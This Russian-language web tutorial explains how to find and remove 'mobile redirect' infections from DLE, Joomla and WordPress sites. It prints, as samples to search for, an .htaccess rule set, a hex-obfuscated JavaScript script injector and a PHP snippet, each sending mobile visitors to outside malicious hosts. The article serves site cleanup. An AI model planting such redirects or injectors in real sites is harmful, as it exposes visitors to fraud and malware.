Вирусы на сайте. Мобильный редирект
galina2601 18-11-2013, 23:11 13 155 Уроки по CMS / Уроки по DLEВ последнее время все чаще Яндекс пугает владельцев сайтов зловещим вердиктом "Мобильный редирект". И сайт начинает выводится в поиске с позорной надписью «Этот сайт может угрожать безопасности вашего компьютера».
Сам Яндекс дает такое определение этому виду заражения:
Мобильный редирект – это перенаправление пользователя на сторонний сайт при попытке просмотра страниц исходного сайта с помощью мобильного устройства (например, телефона).
Если говорить простым языком, то при заходе на сайт со стационарного компьютера, никаких опасностей не предвидится. Но если вы зайдете на этот же сайт с телефона, планшета, или любого другого мобильного устройства, вас перебросит на другой сайт, содержащий всевозможные пакости для вас. Хорошо если это будет просто сайт с рекламой или чем-то подобным. Но может быть и так, что ничего не подозревающему посетителю вежливо предложат обновить "устаревший" браузер, или закачать обновление для антивируса, или отправить смс, якобы подтверждающую, что вы не робот, и так далее, масса вариантов. А в итоге можно лишится денег на телефоне, и связанном с ним счете в банке, стать, не подозревая того, рассыльщиком спама, короче говоря, получить серьезную головную боль.
Особенно подвержены этому виду заражения сайты на нелицензионных версиях cms DLE и на бесплатных cms Joomla и WordPress.
Что делать и как найти вредоносный код, если уж с вами такая оказия приключилась.
Действие первое.
Поменять на всякий случай все пароли - на хостинг, на доступ по ftp, на вход в админпанель. Конечно, с большой долей вероятности можно предположить, что вредоносный код был получен, так сказать, в качестве бонуса, вместе с "бесплатным" шаблоном или "бесплатной" версией cms. Однако пароли поменять никогда не помешает.
Действие второе.
Проверить все файлы .htaccsess на наличие редиректов такого вида:
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://www.vmaline.net/tds/go.php?sid=17 [L,R=302]
Особенно обратить внимание на строчки вида:
Естественно, адрес сайта может быть любой.
Если такие строчки есть, срочно удалить и установить для файлов .htaccsess права на доступ 444.
Действие третье.
Если файлы .htaccsess не содержат редиректы, следующим шагом будет проверка всех ява-скриптов. Практически любой шаблон сайта содержит ява-скрипты. Это могут быть разнообразные слайд-шоу, выпадающие меню, интерактивные элементы и так далее. Где их искать?
Во-первых, они могут быть в файле main.tpl (для cms DLE). Во-вторых, в любом из остальных tpl-файлов, в-третьих, в файлах ява-скриптов с расширением .js, в-четвертых, во всех php-файлах скрипта. Что ищем? Код вида:
x74\x79\x70\x65\ x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\
x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\
x74\x70\x3A\x2F\x2F\x69\x6B\x6E\x6F\x70\x6F\x2E\x72\x75\
x2F\x69\x6B\x6E\x6F\x70\x6F\x5F\x62\x2E\x6A\x73\
x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\
x65"];document[_0xb69a[1]](_0xb69a[0]);
Или фрагменты кода типа:
base64_decode
Или вот такой код в php-файлах:
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
Понятно, что просматривать все файлы долго и сложно. Можно и нужно упростить себе задачу - скачать последнюю лицензионную версию вашей cms и установить ее взамен стоящей. После этого огромная часть работы отпадет сама собой. Так как вы четко будете знать, что в скриптах движка вируса нет. А просмотреть файлы шаблона уже гораздо проще - их не так уж и много.
А еще лучше - скачать неплохую бесплатную программу с многоговорящим названием ai-bolit. Взять ее можно на сайте //www.revisium.com/ai/. Там же можно почитать, как с ней работать. Программа действительно хороша, так как ее на вооружение берут серьезные хостинг-компании. Ай-болит не лечит, а выполняет следующие действия:
ищет вирусы, вредоносные и хакерские скрипты;
определяет дорвеи;
ищет редиректы в .htaccess на вредоносные сайты
составляет список открытых для записи папок...
И еще много всяких полезных мелочей.